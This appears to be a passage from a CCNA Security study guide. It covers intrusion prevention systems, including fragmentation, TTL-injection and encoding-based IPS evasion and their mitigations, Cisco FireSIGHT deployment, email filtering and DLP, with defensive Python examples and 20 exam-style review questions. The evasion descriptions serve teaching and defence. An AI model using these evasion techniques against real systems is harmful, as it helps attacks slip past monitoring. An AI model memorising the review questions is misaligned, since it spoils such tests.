An HIPS can be configured to also focus on attacks that may be relevant to the role that the server is performing (for example, looking for DNS pollution attacks on DNS servers). But there are drawbacks to these systems.
A high number of false positives can cause a lax attitude on the part of the security team.
Constant updating of signatures is needed.
There's a lag time between the release of the attack and the release of the signature.
An HIPS cannot address authentication issues.
Encrypted packets cannot be analyzed.
In some cases, IPS software is itself susceptible to attacks.
Despite these shortcomings, an HIPS can play an important role in a multilayer defense system.
Network-Based IPS
A network-based IPS (NIPS) monitors network traffic on a local network segment. This is in contrast to a host-based IPS (HIPS), which monitors a single machine.
One of the disadvantages of an NIPS (which is an advantage of an HIPS) is that it cannot monitor any internal activity that occurs within a system, such as an attack against a system that is carried out by logging on to the system's local terminal.
Most IPSs are programmed to react in certain ways in specific situations. Event notification and alerts are crucial to IPSs. These notifications and alerts inform administrators and security professionals when and where attacks are detected.
Promiscuous Mode
To monitor traffic on the network segment, the network interface card (NIC) must be operating in promiscuous mode. Moreover, an NIPS is affected by a switched network because generally an NIPS monitors only a single network segment, and each switch port is a separate collision domain.
Detection Methods
These systems can use several methods of detecting intrusions. The two main methods are as follows:
Signature Based: Analyzes traffic and compares it to patterns, called signatures, that reside within the IDS database. This means it requires constant updating of the signature database.
Anomaly Based: Analyzes traffic and compares it to normal traffic to determine whether the traffic is a threat. This means any traffic out of the ordinary will set off an alert.
Evasion Techniques
While IPSs can do some amazing things, they are not infallible. Several techniques have been developed over the years by malicious individuals that allow them to get malicious code past the IPS. Some of the more common approaches are covered in this section.
Packet Fragmentation
Packet fragmentation is the process of breaking a packet that is larger than the maximum transmission unit (MTU) into smaller pieces called fragments that abide by the size limits of the MTU. Various networking technologies enforce different MTUs. For example, while the MTU in Ethernet is 1,500 bytes, in an FDDI network the MTU is 4,470 bytes.
Routers on the network enforce the MTU and perform fragmentation of packets as needed to meet the MTU. When the fragments arrive at the destination, they are reassembled. To communicate exactly how the reassembly should occur, several header fields are used in the IP header. Figure 16.1 shows the IP header.
FIGURE 16.1 IP header fragmentation flags
Three fields are of interest.
Identification provides a number that identifies packets that belong to the same transmission that need to be reassembled.
Flags is a field consisting of three bits. As shown in Figure 16.1, the first bit (position 0) is reserved and not used in the fragmentation process; the second bit, when set, means don't fragment this packet, in which case, if the packet is oversized, an ICMP message will be sent to the source indicating it cannot be sent without fragmentation. The third bit, when set, means this packet is part of a series of fragments and there are more to come. If this is the last fragment in a series of fragments, this bit will not be set.
Fragment Offset indicates to the reassembling host where this fragment belongs. It does so by indicating how many bytes away from the beginning of the payload the fragment is.
The fragmentation process follows this sequence:
1. A router makes the decision that a packet must be fragmented.
2. The router splits the packet into fragments, each with an identical IP header apart from the flag bits and the offset values.
3. The destination reassembles the fragments. It recognizes the first fragment because it has an offset value of 0. It then uses the offset values of each fragment to properly position the fragments. It recognizes the last fragment because the More Fragments bit is off.
This process is illustrated in Figure 16.2, where an MTU of 3,300 bytes is enforced on a packet that is 11,980 bytes. As you can see, the first fragment is given an Offset of 0 and the More Fragments bit is on, indicating more fragments to the receiver. The second packet has an Offset value of 410 and has the More Fragments bit on. The third and final fragment has an Offset value of 820, and since it is the last fragment, the More Fragments bit is off.
FIGURE 16.2 Fragmentation process
So, how does the fragmentation attack work? The attacker fragments the packet containing the malicious code so that it becomes difficult for the IPS to recognize the code in such a fragmented fashion. This process is shown in Figure 16.3, where a malicious CGI script that, as shown in the original IP packet at the top, would probably be recognized by the IPS is split into fragments that may not be recognized by the IPS. (It is not important to understand the script.) In this case, a tool called fragroute was used to split the packet into fragments.
FIGURE 16.3 Fragmentation attack
The mitigations to this attack are to do the following:
Use an IPS that performs signature analysis against the entire packet rather than individual fragments. This requires the ability to perform stream reassembly.
Use protocol analysis to evaluate the entire packet for violation of protocol standards.
Injection Attacks
In an injection attack, the attacker inserts data that will be accepted by the IPS but will be ignored by the target system. One approach takes advantage of the TTL feature of IP and fragmentation. The time-to-live (TTL) value is used in IP to prevent a packet from looping endlessly. When a packet's TTL value goes to zero (it is decremented at each hop), it gets dropped by the router.
In the attack (as shown in Figure 16.4), the attacker injects a bogus string into the attack code and then breaks the attack into three fragments. Then he manipulates the TTL value of the fragment containing the bogus string in such a way that the fragment dies (and never gets delivered) before it reaches the destination. If the IPS does not consider the fragment offset values or TTL values, it will detect the bogus string rather than the actual payload. The result is that after inspection by the IPS, the bogus string does not get delivered. The attack payload does.
FIGURE 16.4 Injection attack
Mitigations to this attack are as follows:
Use an IPS that performs stream reassembly, which allows the IPS to recognize the attack.
Use an IPS that performs TTL value assessment, which allows the IPS to recognize the lower TTL for the fragment containing the bogus string.
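The fragmentation sequence above and the two mitigations (stream reassembly before signature matching, TTL assessment across fragments), as an added Python example that is not the book's code. It builds fragments as steps 1 to 3 describe (identical header apart from flags and offset), reassembles them, and shows that a per-fragment signature check misses a pattern straddling a fragment boundary while a check on the reassembled payload finds it. Fragment offsets are counted in 8-byte units, which is why a 3,300-byte MTU yields offsets 0, 410 and 820 as in Figure 16.2; the 9,000-byte packet, the signature bytes and the TTL values are constructed, and the addresses 192.168.5.20 and 201.3.3.3 are borrowed from Chapter 15.

```python
import struct

# Added example, not the book's code: IPv4 fragmentation as the chapter
# describes it, reassembly, and the two IPS checks the mitigations call for
# (stream reassembly before signature matching, and TTL consistency across
# fragments). Only the header fields the chapter discusses are modelled; the
# checksum is left at 0, and the signature and packet are constructed.

IP_HEADER_LEN = 20
IP_FORMAT = "!BBHHHBBH4s4s"   # ver/ihl, tos, total length, id, flags+offset,
                               # ttl, protocol, checksum, src, dst
FLAG_DF = 0x2   # flags bit 1: don't fragment
FLAG_MF = 0x1   # flags bit 2: more fragments follow
SRC, DST = bytes([192, 168, 5, 20]), bytes([201, 3, 3, 3])
SIGNATURE = b"CONSTRUCTED-TEST-SIGNATURE"   # stands in for an IPS signature


def build_header(identification, flags, offset_units, ttl, total_length):
    """Flags occupy the top 3 bits of the 16-bit word; the offset is counted
    in 8-byte units in the remaining 13 bits."""
    flags_offset = (flags << 13) | (offset_units & 0x1FFF)
    return struct.pack(IP_FORMAT, 0x45, 0, total_length, identification,
                       flags_offset, ttl, 6, 0, SRC, DST)


def parse_header(packet):
    fields = struct.unpack(IP_FORMAT, packet[:IP_HEADER_LEN])
    return {"total_length": fields[2], "id": fields[3],
            "flags": fields[4] >> 13, "offset": fields[4] & 0x1FFF,
            "ttl": fields[5]}


def fragment(packet, mtu):
    """The router's job (steps 1 and 2): split a packet larger than the MTU
    into fragments that share its header except for flags and offset. Each
    non-final fragment carries a multiple of 8 payload bytes, so a 3,300-byte
    MTU gives 3,280-byte payloads and offsets 0, 410, 820 (Figure 16.2)."""
    if len(packet) <= mtu:
        return [packet]
    hdr = parse_header(packet)
    if hdr["flags"] & FLAG_DF:
        raise ValueError("DF set: oversized packet is dropped with an ICMP error")
    payload = packet[IP_HEADER_LEN:]
    chunk = (mtu - IP_HEADER_LEN) // 8 * 8
    frags = []
    for start in range(0, len(payload), chunk):
        piece = payload[start:start + chunk]
        flags = FLAG_MF if start + chunk < len(payload) else 0  # MF off on last
        header = build_header(hdr["id"], flags, start // 8, hdr["ttl"],
                              IP_HEADER_LEN + len(piece))
        frags.append(header + piece)
    return frags


def reassemble(frags):
    """The destination's job (step 3), and what an IPS doing stream
    reassembly performs. Returns (payload, ttl_mismatch); ttl_mismatch is
    True when fragments of one datagram arrived with different TTLs, the
    signal the injection-attack mitigation looks for."""
    parsed = sorted(((parse_header(f), f[IP_HEADER_LEN:]) for f in frags),
                    key=lambda item: item[0]["offset"])
    if len({h["id"] for h, _ in parsed}) != 1:
        raise ValueError("fragments belong to more than one datagram")
    payload = b""
    for h, data in parsed:
        if h["offset"] * 8 != len(payload):
            raise ValueError("gap or overlap at offset %d" % h["offset"])
        payload += data
    if parsed[-1][0]["flags"] & FLAG_MF:
        raise ValueError("final fragment (MF clear) not received")
    ttls = {h["ttl"] for h, _ in parsed}
    return payload, len(ttls) > 1


def per_fragment_match(frags, signature):
    """A naive IPS that inspects each fragment on its own."""
    return any(signature in f[IP_HEADER_LEN:] for f in frags)


def reassembled_match(frags, signature):
    """An IPS that reassembles the stream before matching."""
    payload, _ = reassemble(frags)
    return signature in payload


def make_sample_packet():
    """A constructed 9,000-byte packet whose signature straddles the first
    fragment boundary (payload byte 3,280) at a 3,300-byte MTU."""
    payload = bytearray(b"A" * 8980)
    payload[3270:3270 + len(SIGNATURE)] = SIGNATURE
    return build_header(0x1234, 0, 0, 64, IP_HEADER_LEN + len(payload)) + bytes(payload)


def with_ttl(frag, ttl):
    """Copy of a fragment with a different TTL (used to show the TTL check)."""
    h = parse_header(frag)
    return build_header(h["id"], h["flags"], h["offset"], ttl,
                        h["total_length"]) + frag[IP_HEADER_LEN:]
```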
Alternate String Expressions
In many protocols, information can be communicated or expressed in multiple ways. For example, HTTP can accept strings expressed in hexadecimal, Unicode, or standard text expressions. Attackers can use this to evade an IPS sensor. If the IPS cannot perform protocol normalization (which decodes the payload to discover its significance), this attack may succeed.
Mitigations to this attack are as follows:
Protocol analysis
Protocol normalization
Introducing Cisco FireSIGHT
Cisco FireSIGHT offers threat protection capabilities that go beyond most IPSs. It not only detects and takes action to prevent attacks, it enables a better understanding of the exposures your environment may possess and helps you to take corrective actions to eliminate them. This section surveys the capabilities of FireSIGHT and the role it can play at various stages of an attack.
Capabilities
There are four categories of functions of which FireSIGHT is capable.
Detection: Attack detection technologies include the following:
IPS: Monitors for malicious and suspicious activity.
Discovery: Enables visibility into all hosts, services, and applications running on the network. This includes traffic discovery, in which you can identify the ways in which resources are being utilized.
Learning: Reports on the state of the environment and detects when changes occur in real time.
Adapting: When changes are detected, FireSIGHT can adapt its configuration to mitigate new risks.
Acting: Actions that are available include the following:
Block, alert, or modify suspicious traffic
Remediate through custom responses such as blocking a downstream router or scanning a device
Automate response and reporting
FireSIGHT is managed using the FireSIGHT Management Center. This application can be hosted on a FireSIGHT Management Center appliance or hosted on a virtual appliance on a VMware server.
Protections
The operations and features of FireSIGHT are best described in terms of how they would be utilized during an attack. Therefore, you will look at these protections in this way.
Before an Attack
The best way to mitigate attacks is to address them before they occur. FireSIGHT provides the following preventative technologies for this:
Blacklisting: Traffic to and from specific IP addresses can be blacklisted, which means that your traffic will be neither sent to nor received from the IP address. When you identify problematic IP addresses, this is an action you take. Moreover, the FireSIGHT Management Center can dynamically download, at configurable intervals, a collection of IP addresses that have been identified by a threat intelligence team called Talos (https://www.talosintelligence.com/) as having a bad reputation in this regard. You can choose to add these to this list if desired.
Advanced Malware Protection (AMP): Two AMP products are included. Cisco AMP for Endpoints is composed of connectors installed on endpoints. It uses a cloud-based detection process that offloads the detection burden to the cloud. Cisco AMP for Networks uses FirePOWER (covered in detail later in this chapter) appliances to detect malware in transit. It can also utilize the cloud for the latest malware information. The system can also store detected files for submission to the Cisco Collective Security Intelligence Cloud for dynamic analysis.
During an Attack
While FireSIGHT uses the aforementioned methods to prevent attacks, prevention is not always possible. Once an attack is under way, the FireSIGHT IPS primarily takes action by identifying and blocking malicious traffic. The IPS is a policy-based feature that allows for monitoring and blocking or altering malicious traffic when the IPS is deployed inline (deployment options are covered in the next section of this chapter).
FireSIGHT uses Snort technology (an IDS). This technology makes use of preprocessors, which examine traffic and in some cases modify the traffic in such a way that attacks that cannot be recognized by the signature can be recognized. For example, one preprocessor helps to recognize malicious code hidden by an IP fragmentation attack.
An IPS policy consists of the following:
Rules that inspect the header content, packet size, and payload
Rule state configuration based on FireSIGHT recommendations
Preprocessors and other detection features
FireSIGHT also generates intrusion event information in a log that includes details such as the following:
Date and time
Event priority
Brief description
Name of the device
Source IP address and port for the event
Destination IP address and port for the event
Name of the logged-in user
Impact flag
After an Attack
After the attack, FireSIGHT provides an assessment of the attack, contains the attack, and helps bring the network back into a normal state. To do this, it uses several features:
FireSIGHT discovery and awareness: This collects information about hosts, operating systems, applications, users, files, networks, geolocation information, and vulnerabilities that is used to report indicators of compromise.
Dynamic file analysis: Captured files can be submitted to the Cisco Collective Security Intelligence Cloud for analysis. The cloud runs a test and returns a threat score to the FireSIGHT Management Center.
Connection data and summaries: Connection data is information about detected sessions, including timestamps, IP addresses, geolocation, and applications.
Understanding Modes of Deployment
The FireSIGHT Management Center can also manage other monitoring devices such as appliances, virtual appliances, and ASA firewalls running software release ASA 9.2 and later. It is also commonly deployed in branch offices in the form of the FireSIGHT module in the ASA.
The devices managed by the FireSIGHT Management Center, acting in the same role as legacy IPS sensors, can be deployed in two modes.
Passive
The sensor receives a copy of the network traffic to analyze while the original traffic flows through the network. Because the sensor only receives a copy, and because by the time the copy is analyzed the original traffic is long gone, FireSIGHT can only function as an intrusion detection system (IDS) when deployed in this mode. There are two ways to implement passive mode.
SPAN
Figure 16.5 illustrates this mode. The sensor is connected to a port on the switch to which all traffic has been mirrored by making the port a SPAN port. Notice that the traffic flow from the device inside the network to a device on the Internet (black dashed line) and then back (gray dashed line) is not interrupted.
FIGURE 16.5 SPAN
Tap
In this deployment mode, the sensor is implemented as a network tap, as shown in Figure 16.6. The tap is placed between the router and the layer 3 switch. It provides full-duplex connectivity between the devices and splits off two simplex mirrors of the full-duplex traffic. All traffic between the two devices must traverse the sensor.
FIGURE 16.6 Tap
Inline
In this mode, the sensing device is placed in the line of traffic and analyzes the original traffic, not a copy, in real time. Therefore, it can take actions on the traffic that allow it to operate as a true IPS. Figure 16.7 shows this mode's operation.
FIGURE 16.7 Inline mode
Positioning of the IPS within the Network
When making this key decision, consider the following factors:
The features you are utilizing (attack detection, policy enforcement, surveillance, anomaly detection, etc.)
Location of critical assets
Bandwidth utilization
Topology
Outside
One of the options is to place the sensor outside the perimeter firewall (ASA). When placed here, the sensor will generate a very high number of alarms because it is exposed to the most untrusted network, the Internet. It will also generate many alarms that you will assess to be false positives (more on false positives in the final section of this chapter) because they will be raised by traffic that the ASA would never have allowed into the network. Figure 16.8 shows this option.
FIGURE 16.8 Outside deployment
DMZ
Servers in the DMZ are exposed to the Internet by design. While placing a sensor here will help to identify attacks on these exposed devices, keep in mind that if these servers are being deployed according to best practices, they will contain no sensitive information and will have been significantly hardened. Figure 16.9 shows this option.
FIGURE 16.9 DMZ deployment
Inside
This is the positioning that yields the most benefit. While the perimeter ASA can provide protection, keep in mind that the users of these interior devices have varying levels of security expertise. This is also where all critical data will be located. Therefore, this will be the best place to deploy a single sensor. Figure 16.10 shows this option. In this option, FireSIGHT is deployed as a module in the ASA and is examining traffic destined for the internal network.
FIGURE 16.10 Inside deployment
Understanding False Positives, False Negatives, True Positives, and True Negatives
All IPSs and IDSs, including FireSIGHT, make incorrect assessments. In some cases, they fail to identify attacks or malicious traffic. In other cases, they alert you that an attack is under way when that is not the case. They also make correct assessments, alerting you to a real attack or ignoring traffic that is not an attack. There are terms used to describe all four of these scenarios. Table 16.1 identifies these terms. Keep in mind that true means the IPS was correct in its assessment and false means it was incorrect in its assessment.
TABLE 16.1 Assessment terms
Term            Meaning
True positive   The IPS alerted you to an attack that is real.
True negative   The IPS did not alert you to a nonexistent attack.
False positive  The IPS alerted you to an attack that is nonexistent.
False negative  The IPS did not alert you to a real attack.
Summary
In this chapter, you learned about some general IPS concepts, such as network-based and host-based deployments; modes of deployment such as inline, SPAN, and tap; and the positioning options available. You also were introduced to false positives and false negatives and the interpretation of these. The chapter covered how both rules and signatures are used in the process of identifying potential attacks. Finally, assessment terms (false positive, false negative, etc.) were discussed.
Exam Essentials
Define IPS terminology. These terms include threat, risk, vulnerability, exploit, and zero-day threat.
Describe the actions of which an IPS is capable. Some examples of these actions are drop, which means the IPS quietly drops the packets involved; reset, which sends a packet with the RST flag, which ends any TCP connection; shun, which accomplishes the same purpose as a reset for non-TCP connections; and block, where the IPS directs another device (a router or firewall) to block the traffic.
Differentiate network-based and host-based IPS. A host-based intrusion prevention system (HIPS) is installed on the device (for the purposes of this discussion, a server), and the system focuses solely on identifying attacks on that device only. This is in contrast to a network-based system, which monitors all traffic that goes through it looking for signs of attack on any machine in the network.
Identify evasion techniques employed to defeat an IPS. These include packet fragmentation, injection attacks, and alternate string expressions.
List four categories of functions of which FireSIGHT is capable. These functions include detection, learning, adapting, and acting.
Describe the deployment modes of an IPS. These include passive modes, such as SPAN and tap, where the device can only operate as an IDS. They also include inline mode, in which the device can take actions on traffic as a true IPS.
Review Questions

1. Which of the following is an identified security weakness to which any specific environment may or may not be vulnerable?
A. Threat
B. Risk
C. Vulnerability
D. Exploit

2. Using which action does the IPS quietly drop the packets involved?
A. Drop
B. Reset
C. Shun
D. Block

3. Which of the following is not a drawback of a host-based IPS?
A. A high number of false positives can cause a lax attitude on the part of the security team.
B. Encrypted packets cannot be analyzed.
C. It cannot monitor any internal activity that occurs within a system.
D. It cannot address authentication issues.

4. Which evasion technique divides the packet into smaller pieces containing the malicious code so that it becomes difficult for the IPS to recognize the code?
A. Packet fragmentation
B. Buffer overflows
C. Injection attacks
D. Cross-site scripting

5. Which of the following is not one of the four categories of functions of which FireSIGHT is capable?
A. Detection
B. Learning
C. Adapting
D. Block

6. Which of the following is any threat not yet remediated by malware vendors or software vendors?
A. Zero-day attack
B. Risk
C. Vulnerability
D. Exploit

7. Which capability of FireSIGHT is aimed at malware?
A. Blacklisting
B. AMP
C. SNORT technology
D. Discovery and awareness

8. Which deployment mode has the sensor connected to a port on the switch to which all traffic has been mirrored?
A. SPAN
B. Tap
C. Inline
D. Promiscuous

9. Which evasion technique relies on the fact that many protocols' information can be communicated or expressed in multiple ways?
A. Packet fragmentation
B. Buffer overflows
C. Injection attacks
D. Cross-site scripting

10. Which of the following is a susceptibility to an external threat that a device or system may possess?
A. Zero-day attack
B. Risk
C. Vulnerability
D. Exploit

11. Using which action does the IPS accomplish the same purpose as a reset for non-TCP connections?
A. Drop
B. Reset
C. Shun
D. Block

12. In which deployment mode is the sensor placed in the line of traffic to analyze the original traffic, not a copy, in real time?
A. SPAN
B. Tap
C. Inline
D. Promiscuous

13. In which positioning option will the IPS sensor generate a very high number of alarms?
A. Outside
B. DMZ
C. Inside
D. Remote

14. Which of the following occurs when a threat and a vulnerability both exist and a threat actor takes advantage of the situation?
A. Zero-day attack
B. Risk
C. Vulnerability
D. Exploit

15. Using which action does the IPS direct another device (a router or firewall) to block the traffic?
A. Drop
B. Reset
C. Shun
D. Block

16. In which deployment mode is the sensor placed between two layer 3 devices, providing full-duplex connectivity between the devices and splitting off two simplex mirrors of the full-duplex traffic?
A. SPAN
B. Tap
C. Inline
D. Promiscuous

17. Which evasion technique inserts data that will be accepted by the IPS but will be ignored by the target system?
A. Packet fragmentation
B. Buffer overflow
C. Injection attacks
D. Cross-site scripting

18. Which of the following is a drawback of network-based IPS?
A. A high number of false positives can cause a lax attitude on the part of the security team.
B. Encrypted packets cannot be analyzed.
C. It cannot monitor any internal activity that occurs within a system.
D. It cannot address authentication issues.

19. Using which action does the IPS end any TCP connection?
A. Drop
B. Reset
C. Shun
D. Block

20. Which of the following is created when a threat exists to which a system is vulnerable?
A. Zero-day attack
B. Risk
C. Mitigation
D. Exploit
Chapter 17
Content and Endpoint Security

CISCO CCNA SECURITY EXAM OBJECTIVES COVERED IN THIS CHAPTER:

7.1 Describe mitigation technology for email-based threats
Spam filtering, anti-malware filtering, DLP, blacklisting, email encryption

7.2 Describe mitigation technology for web-based threats
Local and cloud-based web proxies
Blacklisting, URL filtering, malware scanning, URL categorization, web application filtering, TLS/SSL decryption

7.3 Describe mitigation technology for endpoint threats
Anti-virus/anti-malware
Personal firewall/HIPS
Hardware/software encryption of local data

Endpoint devices in the network such as laptops, printers, workstations, scanners, cameras, and other such devices represent one of our biggest challenges in securing the environment. First, there are many more of these than there are infrastructure devices. Moreover, these devices are most likely in the hands of users who either lack security knowledge or just don't care about it. In this chapter, you'll learn how to overcome these challenges and secure the endpoints in the environment.

In this chapter, you will learn the following:

Mitigation technology for email-based threats, including spam filtering, anti-malware filtering, data loss prevention (DLP), blacklisting, and email encryption

Mitigation technology for web-based threats, including local and cloud-based web proxies, blacklisting, URL filtering, malware scanning, URL categorization, web application filtering, and TLS/SSL decryption

Mitigation technology for endpoint threats, including antivirus/anti-malware, personal firewall/HIPS, and hardware/software encryption of local data
Mitigating Email Threats

Threats to email strike at the very heart of your enterprise communication system. It has become evident that even tech-savvy users can fall prey to these threats. In this section, you'll learn about a few methods you can use to mitigate these threats. These methods are not mutually exclusive, and when deployed together, they stand as a good example of exercising the principle of a layered defense, or defense in depth. Following that, you'll learn about the ways the Cisco Email Security Appliance (ESA) can address these threats.

Spam Filtering

Spam is both an annoyance to users and an aggravation to email administrators, who must deal with the extra space the spam takes up on the servers. Spam filters are designed to prevent spam from being delivered to mailboxes. The issue with spam filters is that legitimate email is often marked as spam. Finding the right setting can be challenging. Users should be advised that no filter is perfect and that they should regularly check quarantined email for legitimate messages.

Reputation-Based Filtering

Reputation-based filtering relies on the identification of email servers that have become known for sending spam. For a system to do this, it must rely on some service for developing these "reputations." As you will see later, an example is Cisco SenderBase, which is the system the Cisco Email Security Appliance (ESA) uses. This repository manages reputation "scores" for servers based on any malicious activity in which a server is reported to have been involved.

Context-Based Filtering

Context-based filtering examines the message and its attachments for sender identities, message content, embedded URLs, and email formatting. These systems use algorithms to examine these items to identify spam.

Anti-malware Filtering

Email can also introduce malware into the environment through both malicious attachments and deceptive links in emails. While user training is the best approach to preventing email-based malware, we know that it doesn't always work. Even security professionals have inadvertently clicked malicious links and attachments by mistake. To augment training, the examination of all email for malware and the filtering of such malicious mail should be part of providing secure email.
DLP

Data leakage occurs when sensitive data is disclosed to unauthorized personnel, either intentionally or inadvertently. Data loss prevention (DLP) software attempts to prevent data leakage. It does this by maintaining awareness of actions that can and cannot be taken with respect to a document. For example, it might allow printing of a document but only at the company office. It might also disallow sending the document through email. DLP software uses ingress and egress filters to identify sensitive data that is leaving the organization and can prevent such leakage. Another scenario might be the release of product plans that should be available only to the sales group. The policy you could set for that document is as follows:

It cannot be emailed to anyone other than sales group members.
It cannot be printed.
It cannot be copied.

There are two locations at which DLP can be implemented.

Network DLP  Installed at network egress points near the perimeter, network DLP analyzes network traffic.

Endpoint DLP  Endpoint DLP runs on end-user workstations or servers in the organization.

You can use both precise and imprecise methods to determine what is sensitive.

Precise methods  These methods involve content registration (fingerprinting the exact documents or records to be protected) and trigger almost zero false-positive incidents.

Imprecise methods  These can include keywords, lexicons, regular expressions, extended regular expressions, metadata tags, Bayesian analysis, and statistical analysis.

The value of a DLP system resides in the level of precision with which it can locate and prevent the leakage of sensitive data.
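To make the difference between the imprecise and precise methods concrete, here is a Python example added by the editor; it is not from the study guide or from any DLP product. It scans a constructed outbound email three ways: a regular expression that flags anything shaped like a payment card number, the same regex followed by a Luhn check-digit test, and content registration, in which the protected product plan is stored only as per-line SHA-256 fingerprints. The sample email, the sample plan and all function names are this example's own.

```python
"""Imprecise vs precise DLP detection on an outbound message: regex, regex plus Luhn, content registration."""
import hashlib
import re

# --- imprecise method: a regular expression for anything that looks like a card number ---
# 13 to 19 digits, optionally separated by single spaces or hyphens, not embedded in a longer digit run.
CARD_CANDIDATE_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn check-digit test: true for well-formed card numbers, false for most random digit strings."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def card_candidates(text: str):
    """Return (digit_string, luhn_valid) for every regex hit, so both verdicts are visible."""
    out = []
    for m in CARD_CANDIDATE_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group(0))
        out.append((digits, luhn_ok(digits)))
    return out


# --- precise method: content registration (fingerprints of the exact records to protect) ---
def normalize(line: str) -> str:
    return " ".join(line.lower().split())


def register(document: str) -> set:
    """Fingerprint each non-empty line of a sensitive document; only the hashes are kept on the DLP system."""
    return {
        hashlib.sha256(normalize(line).encode()).hexdigest()
        for line in document.splitlines()
        if line.strip()
    }


def registered_matches(text: str, fingerprints: set):
    """Lines of an outbound message that reproduce a registered line exactly (after normalization)."""
    return [
        line for line in text.splitlines()
        if line.strip() and hashlib.sha256(normalize(line).encode()).hexdigest() in fingerprints
    ]


# Constructed sample data (hypothetical): a registered product plan and one outbound email.
REGISTERED_PLAN = """\
Q3 roadmap: launch the Falcon appliance in October.
Unit pricing: 4,200 per appliance, 15% channel margin.
"""

OUTBOUND_EMAIL = """\
Hi, please bill the client card 4111 1111 1111 1111, exp 09/27.
Ticket reference 1234-5678-9012-3456 is just the internal order id.
q3 Roadmap:  launch the FALCON appliance in October.
"""


def scan(text: str = OUTBOUND_EMAIL, plan: str = REGISTERED_PLAN) -> dict:
    candidates = card_candidates(text)
    return {
        "regex_hits": [d for d, _ in candidates],                 # imprecise: flags both numbers
        "luhn_valid": [d for d, ok in candidates if ok],          # validated: only the real card
        "registered": registered_matches(text, register(plan)),  # precise: exact registered content
    }


if __name__ == "__main__":
    for k, v in scan().items():
        print(k, v)
```

The regex alone flags the ticket number as well as the card, which is the false positive the text warns about; the Luhn test discards it. The registered-content check matches the roadmap line despite its changed case and spacing, and it does so without the DLP system ever holding the plan in clear text, which is why content registration is both precise and safe to deploy on a perimeter device.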
Blacklisting

Blacklisting identifies bad senders. Whitelisting occurs when a list of acceptable email addresses, Internet addresses, websites, applications, or other identifiers is configured as good senders or as allowed. Graylisting is somewhere in between the two and is used when an entity cannot be identified as a whitelist or blacklist item. In the case of graylisting, the new entity must pass through a series of tests to determine whether it will be whitelisted or blacklisted. In SMTP graylisting specifically, the test is a temporary rejection: mail from a previously unseen sender is refused with a temporary error code, and it is accepted only when the sending server retries after a delay, which legitimate mail servers do and many spam engines do not. Whitelisting, blacklisting, and graylisting are commonly used with spam filtering tools.
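The following Python is an example added by the editor, not code from the study guide or from any mail product. It models the decision an inbound mail gateway makes for each connection: blacklist first, then whitelist, then the graylisting test on the (client IP, sender, recipient) triplet, with the SMTP reply codes a real MTA would return. The session in `demo()` and all names are this example's own.

```python
"""SMTP graylisting decision for an inbound connection, with the blacklist and whitelist checked first."""
from dataclasses import dataclass, field

REJECT = "550 5.7.1 Sender blocked by policy"               # permanent: blacklisted
TEMP_FAIL = "451 4.7.1 Graylisted, please try again later"  # temporary: a real MTA will retry
ACCEPT = "250 OK"


@dataclass
class Graylister:
    min_retry_delay: int = 300                        # seconds a new sender must wait before retrying
    blacklisted_ips: set = field(default_factory=set)
    whitelisted_domains: set = field(default_factory=set)
    first_seen: dict = field(default_factory=dict)    # triplet -> time it was first refused
    known_good: set = field(default_factory=set)      # triplets that have retried correctly

    def decide(self, client_ip: str, mail_from: str, rcpt_to: str, now: float) -> str:
        if client_ip in self.blacklisted_ips:
            return REJECT
        if mail_from.rsplit("@", 1)[-1].lower() in self.whitelisted_domains:
            return ACCEPT
        triplet = (client_ip, mail_from.lower(), rcpt_to.lower())
        if triplet in self.known_good:
            return ACCEPT
        first = self.first_seen.get(triplet)
        if first is None:
            self.first_seen[triplet] = now            # never seen: refuse temporarily and remember
            return TEMP_FAIL
        if now - first < self.min_retry_delay:
            return TEMP_FAIL                          # retried too fast: still refuse
        self.known_good.add(triplet)                  # proper retry: promote to known-good
        return ACCEPT


def demo():
    """Constructed session: a legitimate MTA, a spam engine that never retries, a listed bad IP."""
    g = Graylister(blacklisted_ips={"203.0.113.9"}, whitelisted_domains={"partner.example"})
    legit = ("198.51.100.5", "alice@mail.example", "bob@corp.example")
    return [
        ("legit first try", g.decide(*legit, now=0)),
        ("legit retry too soon", g.decide(*legit, now=60)),
        ("legit retry", g.decide(*legit, now=400)),
        ("legit later mail", g.decide(*legit, now=5000)),
        ("spam engine", g.decide("192.0.2.77", "promo@bulk.example", "bob@corp.example", now=10)),
        ("blacklisted ip", g.decide("203.0.113.9", "x@y.example", "bob@corp.example", now=20)),
        ("whitelisted domain", g.decide("192.0.2.8", "ceo@partner.example", "bob@corp.example", now=30)),
    ]


if __name__ == "__main__":
    for label, code in demo():
        print(f"{label:22s} {code}")
```

The cost of graylisting is the delay on first contact, which is why whitelisting known partners ahead of the check matters, and the `known_good` set must be persisted and expired in a real deployment or every restart re-delays everyone.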
Email Encryption

Email traffic, like any other traffic type, can be captured in its raw form with a protocol analyzer. If the email is cleartext, it can be read. For this reason, encryption should be used for all emails of a sensitive nature. While this can be done using the digital certificate of the intended recipient, this is typically possible only if the recipient is part of your organization and your company has a public key infrastructure (PKI). Many email products include native support for digital signing and encryption of messages using digital certificates.

While it is possible to use email encryption programs like Pretty Good Privacy (PGP), it is confusing for many users to use these products correctly without training. Another option is to use an encryption appliance or service that automates the encryption of email. Regardless of the specific approach, encryption of the message content is the only mitigation for information disclosure from captured packets.
Cisco Email Security Appliance

The Cisco Email Security Appliance can address each of these concerns. The features that address email issues in the ESA are covered in this section. At the end of the section is a discussion of the message flow when using ESA.

Reputation and Context-Based Filtering

ESA performs both types of filtering. When utilizing Cisco SenderBase, the actions taken by ESA depend on the reputation score of the source. If the sender score is between –1 and +10, the email is accepted. If it is between –3 and –1, the email is accepted but additional emails from that sender are throttled. If it is between –10 and –3, it is blocked.

Viruses and Anti-malware

ESA uses a multilayer approach to this issue. The three layers of defense are as follows:

Outbreak Filters  Downloaded from Cisco SenderBase. These filters are generated by watching global email traffic patterns and looking for signs of an outbreak. When an email is received from a server on the list, it is quarantined until antivirus signatures that address the risk are available.

Antivirus Signatures  Used in the same way any anti-malware product uses them: to identify the presence of malware in the email.

Outbound Scanning  Scans email that is leaving the organization for the presence of malware.

Email Data Loss Prevention and Encryption

